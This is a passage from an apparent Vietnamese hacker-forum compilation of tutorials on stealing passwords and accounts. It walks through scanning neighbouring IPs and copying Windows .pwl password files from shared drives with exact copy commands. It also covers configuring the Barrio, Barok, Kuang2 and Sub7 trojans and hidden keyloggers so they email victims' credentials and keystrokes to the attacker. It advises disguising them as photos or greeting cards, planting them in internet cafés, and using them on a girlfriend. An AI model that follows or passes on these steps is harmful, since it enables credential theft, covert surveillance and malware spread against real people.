sender.exe thành một name khác ví như MyPic hoặc Love ...
sau khi chọn Creat MPS thì một file mà bọn chọn ở trên ví
dụ sender.exe sẽ được tạo ra ở thư mục mà bạn unzip
MPS ra ...
gởi file này cho nạn nhân ...
lưu ý : nếu nạn nhân mở file này ra thì máy đó chỉ bị
nhiễm virus ... chứ chưa hề hack được pass của nạn nhân
...
nếu muốn lấy được pass của nạn nhân thì hãy dùng
trình boot kick để kick cho nạn nhân disconnect ... khi login
vào lại thì ồ ... mất pass
Nếu ko thì chờ kẻ khác dại dột ngồi vào máy đó login
vào YM thì pass cứ thế mà send vào YM của bạn ...
Nhận pass và mọi thứ chỉ ở YM ko phải ở mail đâu nhé
...
Nếu muốn lấy pass của bạn gái ( người yêu ) thì chát
với cô ấy rồi bảo là gửi ảnh cho cô ấy...hic..khi cô
ấy xem ảnh của bạn gửi qua Y!M thì...lúc đó bạn nhờ
ai đó kick cô ấy ra khỏi mạng------>Đảm bảo lấy pass
được 100%...

Hack acc bằng ENT3

Phương pháp hack Acc Internet một cách nhanh chóng và hiệu
quả nhất, thậm chí nếu anh em cần FPT card thì sẽ có FPT
card, cần 1260 prepair thì sẽ có 1260 prepair, cần Netnam thì
sẽ có Netnam, cần Acc ở HN thì sẽ có Acc ở HN, cần Acc
ở HCM thì sẽ có Acc ở HCM . . . tóm lại là chỉ phụ
thuộc vào sự nhanh nhẹn của anh em.

Theo tính toán của tôi, thì khi anh em dùng Ent3 để mở
một máy tính đang Online thì sẽ mất trung bình là 3 phút
để mở một Folder, do đó để truy nhập vào
C:\windows\*.pwl sẽ mất tổng cộng là 9 phút mà kết quả
là chưa chắc đã kiếm được file Password. Nhưng nếu dùng
cách của tôi thì chỉ cần nhiều nhất 40s là đã có thể
thu được kết quả. Thật ra công cụ mà tôi dùng vẫn
chỉ là Ent3. Sau đây tôi sẽ trình bày cặn kẽ cách thức
mà tôi đã làm cho anh em Newbie tìm hiểu.

Công cụ cần dùng: Ent3 và PWL 6.8, anh em có thể download ở
đây.

http://www.soft4you.com/vitas/pwltoolr.htm
http://www.tamos.com/

Nội dung chính của phương pháp: scan tất cả các máy tính
đang Online có IP nằm lân cận với IP của máy mình, nếu
máy nào có chia sẻ.

- Tìm IP của máy mình: bạn vào Run, gõ winipcfg -> lấy IP
Address, VD đó là 203.210.128.25, bạn chỉ cần quan tâm đến
3 trường đầu của địa chi là 203.210.128
- Vào Ent3, chọn NBScan, trong ô Starting IP address gõ
203.210.128.1, còn trong ô Ending IP address gõ 203.210.128.255
rồi kích vào nút Start ---> Ent3 sẽ quét tất cả các máy
đang Online tại thời điểm đó, ta chỉ quan tâm đến
những máy có trường RS là Yes (vì đây là những máy có
chia sẻ một cái gì đó). Mẹo nhỏ, bạn hãy kích chuột
vào trường RS --> những máy có chia sẻ sẽ được gom
lại thành một nhóm -->giúp bạn dễ nhìn hơn và không bị
nhầm.

- Giả sử như máy có địa chỉ IP là 203.210.128.10 và nó
có trường RS là Yes, bạn hãy mở một cửa sổ DOS Prompt
và gõ chính xác như sau:

C:\copy\\203.210.128.10\c\windows\*.pwl c:\

câu lệnh này sẽ copy tất cả các file có đuôi PWL vào ổ
C của máy mình, câu lệnh này chỉ mất tối đa 40s để
biết kết quả là có được hay không (cách thông thường
của bạn là mất 9 minute)
Nếu mà copy được thì bạn cần copy thêm file system.ini,
(tầm quan trọng của file này sẽ được nói đến sau). Cú
pháp:

C:\copy\\203.210.128.10\c\windows\system.ini c:\

- Nếu muốn tăng tốc độ săn Acc, bạn nên mở 2 hoặc 3
cửa sổ DOS Prompt để copy cùng một lúc.

- Giả sử bạn copy được file "Vidu.PWL", để biết được
Username và Pass của victim bạn cần dùng công cụ PWL Net
Tool 6.8. Công cụ này đòi hỏi bạn phải biết được
Username của file "Vidu.PWL",
Lúc này bạn phải mở file system.ini đã copy ở trên và
search từ khoá " PWL ", giả sử kết quả thu được là:
"ABC=C:\windows\ABC.PWL" thì username ở đây chính là ABC. Bạn
điền ABC vào ô username rồi kích chuột vào nút Search
Password Fast --> OK

- Nói ra thì dài dòng nhưng toàn bộ công việc trên bạn
chỉ cần mât 5 minutes là thực hiện xong.

- Nếu bạn muốn hack được card FPT hoặc thuê bao FPT thì
bạn phải dùng chính card FPT hoặc thuê bao FPT trong khi scan
IP (IP của nó là 210.245.xxx.xxx). Còn nếu bạn muốn hack
1260 prepair, thuê bao 1260 (IP của nó là 203.210.xxx.xxx),
Netnam, .... thì cũng tương tự như vậy .

- Bạn ở địa điểm nào (HN, HCM...) thì hầu như chỉ hack
được Acc của người ở địa điểm đó, do đó nếu
member nào ở HCM thì hãy chịu khó hack Acc để trao đổi
với anh em.

- Thêm mẹo nhỏ rất quan trọng đến tốc độ săn Acc đó
là khi đang ở cửa sổ DOS Prompt

C:\

giả sử câu lệnh trước của bạn là
C:\copy\\203.210.128.10\c\windows\*.pwl c:\

thì bạn chỉ cần nhấn phím mũi tên lên thì nó sẽ hiện
lại câu lệnh y hệt như câu lệnh trước của bạn, đó
là:

C:\copy\\203.210.128.10\c\windows\*.pwl c:\

tác dụng của việc này:
khi bạn gõ C:\copy\\203.210.128.10\c\windows\*.pwl c:\ mà không
copy được
cái gì, thì bạn chỉ cần nhấn phím mũi tên lên rồi thay
đổi một chút trong địa chỉ IP là ta đã có một câu
lệnh mới, rất nhanh mà không cần phải gõ lại dài dòng
như trên

Cách lấy pass bằng Trojan Barrio 5.0

Giới thiệu:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Nó có chức năng chính như là: Khi máy nạn nhân bị
"dính", nó sẽ lấy số Dial-up, password, account...của nạn
nhân và gửi về Email cho bạn. Ngoài ra nó còn có chức
năng Keylogger- ghi lại nhưng gì mà nạn nhân đánh trên bàn
phím vào một file và gửi về cho bạn qua E-mail. (Nhưng
trước tiên bạn phải đặt cấu hình cho nó.)

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 1:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trước tiên bạn phải Download nó về, sau đó chạy
file Setup để cài đặt nó( Bạn cứ chọn theo các thông s
889; mặc định của nó là được). Sau khi cài đặt xong,
nó tạo một cái Shortcut ngoài màn hình cho bạn, bạn click
vào đó để bắt đầu thiết đặt cấu hình cho nó .

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 2:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau khi click file chạy của nó xuất hiện màn hình như
Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xuất hiện cửa sổ . Bạn đánh vào địa chỉ Email
của bạn- Click Add.Đây la địa chỉ Trojan sẽ gửi thông
tin về cho bạn. Xong, click Next.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Chọn STMP-server: Bạn chọn mai.vnn.vn (tôi thì
thường dùng hcm-mail-prepaid.vnn.vn) Click Next.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp đến chọn thời gian mà Trojan sẽ gửi thông
tin về cho bạn: Click Next.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cửa sổ mới xuất hiện- Bạn đánh vào file mà
bạn muốn lấy trên máy nạn nhân.(Muốn lấy password của
họ thì bạn đánh vào *.pwl)Trojan sẽ lấy và file này về
cho bạn, bạn chỉ việc giải mã file là lấy được
password, số Dial-up, account... Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xuất hiện cửa sổ mới. Bạn đánh vào tiêu đề
của Window mà bạn muốn Keylogger.(Ví dụ: Bạn muốn ghi
lại những gì victim đánh trong khi chat thì đánh vào là:
Yahoo Messenger )Xong chọn Add. Muốn bỏ cái nào bạn chọn
nó rồi nhấn Remove. Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xuất hiện cửa sổ cho phép bạn chọn cách hiển
thị như 1 kiểu báo lỗi chương trình để đánh lừa
victim khi họ click hoạt file. Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

=> Tiếp tục chọn Next => Next. Xuất hiện cửa sổ:
Bạn chọn file muốn đính kèm như là BKAV hay 1 file ảnh
nào đó để lừa victim Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xuất hiện cửa sổ bạn đánh vào tên cho Trojan,
chọn cái tên nào hấp dẫn 1 chút như là: Happy Valentine.exe
chẳng hạn. Click Next

<!--[if !supportEmptyParas]--> <!--[endif]-->

=>Tiếp tục chọn Next =>Next =>Nó sẽ tạo cho bạn 1
file mới với tên mà bạn đã chọn (Happy Valentine.exe).
Bạn gửi mail cho nạn nhân và đính kèm nó vào . Bây giờ
bạn chỉ việc đợi cho victim click hoạt file đó là OK!

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

( Lưu ý đây là bài viết cũ nên có thể có vấn đề
lỗi ở đâu đó hoặc chỉ dẫn không còn chính xác , bạn
chỉ nên tham khảo cho biết mà thôi )

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cách sử dụng Trojan Barok

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 1:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Load con Barok về rồi giải nén

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 2:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Chạy file Client.exe

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 3:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Click vào openserver, chọn file barok.exe và open

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 4:

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ File name: tên file Barok.exe (hoặc bất kỳ File nào
khác)

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Outgoing Mail server (SMTP): Mail.vnn.vn

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Your mail address: địa chỉ email của bạn
(your...@yahoo.com)

<!--[if !supportEmptyParas]--> <!--[endif]-->

+ Trong mục Schedule Send: * every online (bạn đánh dấu
mục nay thì trojan sẽ gửi acc về cho bạn hàng ngày)

<!--[if !supportEmptyParas]--> <!--[endif]-->

* Every (bạn tùy chọn số ngày trojan gửi acc về)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bước 5:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau khi điền đầy đủ như trên bạn click vào save
server! Bây giờ bạn gửi file Barok.exe cho victim! và cho cho
victim mở File này ra là OK!

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

( Lưu ý đây là bài viết cũ nên có thể có vấn đề
lỗi ở đâu đó hoặc chỉ dẫn không còn chính xác , bạn
chỉ nên tham khảo cho biết mà thôi )

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cách sử dụng trojan Kuang 2

<!--[if !supportEmptyParas]--> <!--[endif]-->

Kuang 2 là Trojan tuyệt vời chuyên dùng để ăn cắp Account
như account Internet và account mail. Vì vậy nó có thể
được coi là công cụ trợ lực cho Hacker chúng ta. Tuy
nhiên nhiều người Download nó về mà không biết xài hoặc
khi gửi cho victim (nạn nhân) thì gặp trục trặc. Vì vậy
hôm nay tôi sẽ hướng dẫn các bạn các sử dụng Trojan
Kuang 2

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

1. Download và Unzip file nén

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

2. Double click vào file K2pS_setup

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

3. Một cửa sổ nhỏ xuất hiện:

<!--[if !supportEmptyParas]--> <!--[endif]-->

- Psender file: click vào open và chọn file: K2pS_full.exe

<!--[if !supportEmptyParas]--> <!--[endif]-->

- SMTP server: mail.yahoo.com or mail.hotmail.com (tùy thuộc
vào địa chỉ email của các bác)

<!--[if !supportEmptyParas]--> <!--[endif]-->

- Destination address: address của các bạn ở yahoo
hoặc hotmail (nếu account là hotmail thì SMTP server sẽ là :
mail.hotmail.com) (cũng không cần ! Các bạn có thể viết là
Mail.vnn.vn )

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

4. Source address: đừng động gì tới nó …leave it as
it is.

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

5. Save lại và nhớ đổi tên con Kuang 2 này nhé
(bất cứ tên gì thật hấp dẫn để dụ victim phải open
nó)

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

6. Compose một email rồi attached con Kuang 2 này vào
rồi gửi đến victim. Hotmail nhận dạng được K2 nhưng
Yahoo thì không. Kuang2 sẽ gửi về account của các bạn 1
email thông báo về user name, password và IP

<!--[if !supportEmptyParas]--> <!--[endif]-->

File Readme của Kuang2 hơi bị phức tạp, new user dễ
bị nhầm lẫn cái phần SMTP server và Destination address
lắm. Moreover, tác giả của Kuang2 claim là Kuang2 có thể
hack được password của yahoo và hotmail, but in fact…it‘s
unable to do so!!! (bad news eh!!!) Kuang2 chỉ có thể steal
password của window Connect to thôi, nếu victim dùng cable thì
Kuang2 cũng chào thua.

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp theo tôi sẽ hướng dẫn các bạn sử dụng
Trojan Kuang2loggeras, đây là một thể biến dạng của
Kuang2:

<!--[if !supportEmptyParas]--> <!--[endif]-->

Ðể lấy password của Yahoo, Hotmail và cả Dial-up thì
có nhiều biện pháp nhưng khả quan hơn cả là password
e-mail cóthể lấy được dễ dàng bằng cách dùng Trojan
đó là con Kuang LoggerAs.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trước hết xin giới thiệu con này có chức năng
lấy password Dial-Up của Victim và có kèm theo cả chức năng
Keylog tức nó sẽ thu gom tất cả các phím được gõ trên
bàn phím khi nó thường trú trong bộ nhớ, tất cả được
tổng hợp trong một con Trojan có kích thước rất bé và
không chiếm nhiều bộ nhớ khi nó nằm thường trú nên
không gây nghi ngờ, ngay cả khi bấm Ctrl+Alt+Del cũng không
thấy nó nốt.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau đó nó sẽ gởi Report về E-mail đã được
định trước.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do không rõ nguồn gốc nên mình không thể cung cấp
chính xác nơi để các bác download về mà dùng nên các bác
phải dùng Google hoặc phiên bản mới cũng thuộc loại
mạnh là Wisenut gõ vào:

<!--[if !supportEmptyParas]--> <!--[endif]-->

"Kuang2loggeras .zip" và sẽ download được con này về.


<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau đó chạy K2las_su.exe chọn Open chọn file Virus
chính là K2logas.exe và nhấp chuột vào Open.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau đó các bác cung cấp SMTP của dịch vụ E-mail mà
bác đang dùng có thể dùng pmail.vnn.vn sau đó sang Destination
address cho biết địa chỉ sẽ nhận Report còn phần Source
address thì để nguyên.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Ở phần bên phải là cấu hình cho con này phần này
có thể xem thêm trong Readme.txt kèm theo Virus.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trong đó phần quan trọng là Send every..X..days "x" ở
đây là số ngày cách nhau mà nó sẽ gởi Report về cho các
bác. Sau đó chọn "Save" là xem như phần cấu hình xong
xuôi.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Lúc này chỉ cần đem file "k2logas.exe" đi cho lây là
xong. Có thể gởi trực tiếp qua e-mail hoặc đem đến các
dịch cụ cho thuê mà chủ động chạy nó trên bất kỳ
máy nào.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Theo tôi thì các bác hãy đem đến dịch vụ cho lây
sau khoảng nữa ngày đến 2 ngày sau, nếu bạn sử dụng
Windows win98,95,win98se... thì hãy đến đúng máy đó mà vào
Windows\System copy lại file "K2logas.cfg" còn nếu sử dụng
Windows 2000, XP thì vào thư mục system32 rồi copy file
"K2logas.cfg" (nếu ở các hệ điều hành khác thì bạn hảy
dùng chức năng Search của Windows). Đây chính là phần data
mà nó log lại được.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau đó sẽ có một đống pass do người ta đến
đây chủ yếu là Checkmail.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Vì sao phải tự đến lấy mà không phải đợi nó
send về lý do là các phòng máy đa số nối mạng Lan và
dùng Proxy để chia sẽ mạng mà con này lại được thiết
kế để send dữ liệu trên máy có gắn modem và khi quay
số vào mạng cụ thể như máy cái của các phòng máy này.


<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau khi đã lấy được file dữ liệu của nó rồi
thì còn phải tách username và mật mã ra d o nó không đủ
thông minh để tự tách cái này ra nhưng chỉ cần xem qua
là biết đâu là tên, đâu là mật mã rồi.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Các bác có thể Test thử nó trên máy của mình
trước khi dùng thực tế, sau đó chỉ cần vào Registry xoá
bỏ phần AutoStart của nó trong khoá Run là xong.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Qua đây mình cũng rút ra được kinh nghiệm là
trước khi có ý định lấy pass của e-mail nào nếu làcủa
Sinh viên hay học sinh thì trước tiên hãy thử dùng ngày
tháng năm sinh của họ và tên người yêu của họ trước.


<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

( Lưu ý đây là bài viết cũ nên có thể có vấn đề
lỗi ở đâu đó hoặc chỉ dẫn không còn chính xác , bạn
chỉ nên tham khảo cho biết mà thôi )

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cach dung Sub7
<!--[if !supportEmptyParas]--> <!--[endif]-->

Sub7 có thể nói là một loại trojan nổi tiếng từ trước
đến nay và cách sử dụng nó thì gần như là thất
truyền, hôm nay tôi cũng cố gắng để mà có thể nói qua
về cách sử dụng nó bằng một số tài liệu , nếu có
gì sai sót mong các bạn cho y' kiến ! Một khi đã có kẻ
dính chấu con này thì máy của họ xem như đã bị ta
điều khiển hoàn toàn, ta có thể làm mất thanh trình
đơn, xem họ gõ những gì (để lấy Password), Restart máy
họ, xem xem họ chat với ai vả tiện thể chat hộ luôn,
khóa bàn phím họ lại, tắt màn hình ...Đầu tiên hãy
Download và giải nén con Sub7 này và giải nén nó gồm
những file sau :

editserver.exe (có hình số 7 và cây búa)

ICQMAPI.dll

server.exe

SubSeven.exe (có hình số 7)

tutorial.txt

<!--[if !supportEmptyParas]--> <!--[endif]-->

Đầu tiên bạn chạy file Editserver.exe để setup cho con
trojan, khi chạy file này, một giao diện sẽ xuất hiện,
trên dao diện này, bạn chọn browse rồi chọn server.exe
rồi thì Open

Tiếp theo chúng ta thiết lập cấu hình cho sub7

Trong phần Startup Method[s], phần này thiết lập cho con Virus
để khi xâm nhập vào máy nạn nhân, nó sẽ khởi động
lúc bật máy bằng hình thức nào, thông qua Win.ini hay thông
qua Registry, nếu xâm nhập bằng registry thì tồn tại
dưới khóa registry nào (key name), nói dài dòng cuối cùng
chắc các bạn không hiểu gì hết thôi thì bạn không nên
thay đổi và cũng không cần thiết phải thay đổi phần
này .

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp là fần Notifications Options

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trong phần victim name:bạn nên bỏ trắng(vì như vậy con sub
7 sẻ lấy tất cả các Acount mail nào dùng chiếc máy đã
bị nhiễm ,nếu thích bạn có thể điền yahoo ID của
victim bạn vào cũng được,nhưng mà mình xin nói trước nha
bạn sẻ bị thiệt thòi đó)

Trong phần enable ICQ notify to UIN : bạn điền mã số ICQ
của bạn vào (khi bạn điền ô này, lúc nạn nhân hòa
mạng internet, nó sẽ gửi thông điệp qua cho ta như IP
number, tên nạn nhân... thông qua ICQ)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trong phần enable IRC notify : Bạn khỏi điền phần này bời
nó cũng tương tự như phần trên nhưng thay vì thông báo
cho ta qua ICQ thì nó thông báo cho ta qua MIRC

Trong fần enable e-mail notify :

Phần Server bạn điền vào mta469.mail.yahoo.com hoặc
mx2.mail.yahoo.com , mx1.mail.yahoo.com đây là những SMTP được
đánh giá là khá ổn định .

Phần User : bạn bỏ trắng

(chú thích thêm là cũng như 2 fần trên,fần nay là sub 7
thông báo cho chúng ta kết wả wa mail,còn 2 cái trên lá wa
trương trình chat)

Trong phần notify to : bạn điền mail của bạn vào

OK,nếu thích bạn hãy ấn TEST nó sẽ gửi thử vào hộp
mail bạn một bức thư, nếu bạn nhận được thư của nó
gửi là coi như OK

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp theo chúng ta thiết lập tiếp phần installation

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trong phần automatically start server on port, bạn nên để
nguyên. và bạn cần ghi nhớ con số này, sau phần này,
bạn sẽ thấy nó cần thiết

Phần server password : bạn điền mã số để khi truy cập
vào máy nạn nhân, người nào biết mã số này mới vào
được. Điều này đảm bảo bạn là người duy nhất xâm
nhập được vào máy nạn nhân.

Tiếp theo bạn đánh chọn vào ô protect server port and
password(Ba phần tiếp theo bạn để nguyên)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Phần cuối cùng là phần độc đáo nhất : bind server with
EXE file : nghe là hiểu liền. Có nghĩa là lây nhiễm con
trojan này vào một file exe. nếu bạn có một file thiệp
điện tử thì bạn nhiễm vào đó, khi nạn nhân chạy, họ
sẽ không phát hiện được là có sự tồn tại của con
Virus trong máy họ vì file EXE vẫn chạy bình thường. Tuy
nhiên điều này làm tăng đáng kể kích thước file của
con virus, tôi thì không dùng chức năng này mà gửi trực
tiếp file server.exe cho nạn nhân. Bạn chọn browse và chọn
file mu̔ 9;n lây nhiễm vào. Xong.Bạn chọn Save Newsettings ở
góc dưới bên trái dao diện. Tới đây bạn đã tạo ra
xong con SubSeven bạn gửi file server.exe cho nạn nhân (nhớ
đổi tên file cho bắt mắt) hoặc gửi file mà bạn chọn
lây nhiễm (trong phần bind server with EXE file) cho nạn nhân
và dụ họ mở. Khi họ mở ra, bạn vào ICQ để chờ, một
thông báo sẽ hiện lên, thông báo này có chứa số IP của
nạn nhân.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sau khi ICQ thông báo cho bạn số IP, bạn chạy file
Subseven.exe Một giao diện sẽ hiện lên

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Trong phần IP/UIN : bạn điền số IP mà ICQ thông báo cho
bạn. Ví dụ 192.168.0.224 còn phần bên phải : port : bạn
điền mã số port mà bạn dùng khi setup con trojan Ví Dụ :
27374. xong nhấn connect. một ô hiện lên yêu cầu bạn
nhập mã số, bạn điền mã số khi bạn setup con trojan
(server password) rồi nhấn OK, thế là xong, bạn đã xâm
nhập được vào máy nạn nhân

Sau đây là 1 số chức năng: Bạn nhắp vào phần
Keys/messages, nó sẽ gồm những phần : Keyboard, chat, msg
message, spy, ICQ take over( Keyboard ): bạn có thể coi mã số
mail trong phần get offline keys, không cho người dùng gõ phím
bằng disable keyboard......;chat : bạn có thể mở 1 cửa sổ
nhỏ để chát với Victim) . Sub7 còn nhiều chức năng nữa
nhưng cái đó xin để cho các bạn tự tìm hiểu .Chúc các
bạn thành công .

Sử dụng IO lấy pass
<!--[if !supportEmptyParas]--> <!--[endif]-->

Ban có thể tải nó về tại đây : IO Setup

Version: 3.27

Serial number: KXA97786370932

<!--[if !supportEmptyParas]--> <!--[endif]-->

Để em nói về cách dùng của nó :

* Sau khi các bác down nó về , trong quá trình install nếu
các bác muốn nó ẩn hoàn toàn trong máy của mình hoặc
victim thì các bác chọn Invisible Installation còn nếu không
thì chọn Standard --> Next --> Nếu các bác chọn Invisible thì
trong mục này các bác chọn " Do not display banner "-->Next -->
Phần này để thiết lập tùy chọn gởi email , các bác
chọn " Keep everything on your PC " nếu các bác muốn thiết
lập sau hoặc nếu muốn thiết lập ngay lúc ấy thì các
bác chọn " Periodically send the STARR... " , các bác nên chọn
Keep cho đỡ m ất thời gian -->Next --> Các bác điền số
serial vào --> Next . Thế là xong phần install nhé .

* Bây giờ các bác mở nó lên , nếu các bác chọn chế
độ Standar thì nó sẽ hiện ra ngay , còn nếu chọn
Invisible thì các bác vào Run chạy starrcmd nó sẽ hiện ra .(
Sau này mỗi khi muốn thấy nó các bác cũng chạy lệnh ấy
)

+ Đầu tiên ta sẽ làm dziệc với bảng Dashboard , trong
mục Select report program các bác chọn dạng file mà iOpus sẽ
gởi logfile về cho mình . Các mục kia các bác cứ để
nguyên.

Đến bảng Monitoring , các bác nên bỏ chọn tùy mục Visual
Monitoring nếu máy victim yếu vì điều này sẽ làm giảm
tốc độ máy khiến victim ngh i ngờ nhưng nếu máy thuộc
loại good thì nên chọn mục này sẽ rất có ích . Trong
mục PC Monitoring , các bác nên chọn tất cả .

Qua bảng Setting , các bác chọn Autostart logging engine ...
,trong mục Password protection các bác nhập pass của mình vào
mục Master password , chọn Encrypt logfile with password và STARR
Commander password tùy chọn này sẽ đòi hỏi nhập pass khi
các bác muốn hiển thị con này ( điều này sẽ rất có
ích khi các bác cài iOpus trên máy victim , vì lỡ victim phát
hiện ra nó thì cũng không tài nào cho nó hiện ra được ,
bó tay ) , các bác nên bỏ chọn Back up & delete STARR..

Đừng bỏ chọn mục Delete Run Menu History after start , nó
sẽ del history của mục Run đ̓ 5; tránh việc victim phát
hiện ra các bác đã sử dụng con iOpus . Trong phần Advance
Setup các bác đừng chỉnh gì cả , trong này có mục
Uninstall , khi các bác muốn gỡ bỏ nó , các bác chỉ có
một cách là vào mục này mà thôi , nó không hiện hữu
trong mục Add/Remove Program nên các bác đừng lo về việc
victim uninstall nó .

Bây giờ tới bảng Email/Network , nếu chỉ để theo dõi
"nội gián" trong nhà thì các bác chọn Local , sau này khi
muốn xem file log của nó các bác chỉ việc vào bảng
Dashboard click Creat report rồi View report để xem . Còn nếu
các bác cài con này trên máy của victim thì chọn Email ,
click vào

" Click for Email Setting " . Các bác điền địa chỉ mail mà
nó sẽ gởi thư v& #7873; , subject và nhất là các bác phải
chọn chế độ " Use built in email account" , tùy chọn này
sẽ giúp cho các bác không bị phụ thuộc vào các SMTP ,
vốn có tiếng là "khó ở" . Các bác nhớ chọn Delete
logfile after transfer and start a new one . Ở mục What to send
các bác chọn Send STARR logfile , ở When to send các bác có
hai tùy chọn lúc mà iOpus sẽ gởi logfile về cho mình :
Một là dựa vào dung lượng của file log hai là dựa vào
thời gian , các bác thích cái nào thì chọn nhá .

Cuối cùng là bảng Active , các bác nhập serial vào click
Active để kích hoạt cho nó hoạt động .

Thế là xong , các bác chỉ việc ngồi ở nhà chờ nó gởi
logfile về cho mình . Nhưng mà cũng không phải d 877; ăn
đâu nhé , cái logfile ấy nó hơi bị rắc rối với người
lần đầu tiên sử dụng nó , các bác phải tự lựa ra
những thứ cần cho mình (vì nó ghi lại toàn bộ những gì
victim đánh mà) , nhưng khi đã sử dụng quen rồi các bác
sẽ thấy nó rất dễ dàng . Chúc các bác thành công nhá .

À , mà các bác nhớ bật nút Start trong bảng Dashboard
trước khi close con iOpus đấy , nếu không các bác ngồi
chờ đến tết Cônggô cũng chẳng có cái file nào gởi về
cho các bác đâu .

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cách sử dụng phần mềm Spy
<!--[if !supportEmptyParas]--> <!--[endif]-->

Phần mềm Spy được đánh giá cao hơn hẳn so với
Perfectkeylogger nó có tính năng hơn Perfectkeylogger ở chỗ
bạn có thể xem trực tiếp Victim chát với ai , vào Website
nào , chụp ảnh màn hình định kì , khởi động lại máy
, Shutdow máy tính, hơn nữa nó lưu lại tất cả những
Website Victim ghé thăm và tất cả những gì mà Victim đánh
trên bàn phím. Để biết được tất cả những điều đó
bạn chỉ cần vào một Link IP mà Spy gửi về cho bạn ,
phần mềm này chưa được Antivirut tiêu diệt nó được
hợp pháp hoá vì là sản phẩm của một công ty giúp cho
bố mẹ quản lý con cái trong gia đình họ sử dụng
Computer

Đầu tiên bạn hãy Download .Tiến hành giải nén và điền
Seri ( đã có sẵn trong File nén ) tiến hành cài đặt :

<!--[if !supportEmptyParas]--> <!--[endif]-->

Các bước cài đặt như thế nào chắc không phải nhắc
các bạn vì nó quá đơn giản .Bạn chỉ cần cài như một
phần mềm bình thường và sau khi cài đặt bạn sẽ
được một File có tên là SSPPYY .EXE :

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiến hành chạy File đó các bạn sẽ thấy các bước để
tạo lên một File Spy như sau

<!--[if !supportEmptyParas]--> <!--[endif]-->

Phần này chính là tên của File Spy mà bạn tạo ra bạn có
thể đặt như thế nào tùy ý các bạn

<!--[if !supportEmptyParas]--> <!--[endif]-->

Phần này nó hỏi bạn có đính cái đó vào một File hình
hay không nếu không bạn chọn No Picture , nếu có chọn File
hình thì bạn ấn vào Use Custom Picture và chọn đường
dẫn đến File hình trên máy bạn.

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

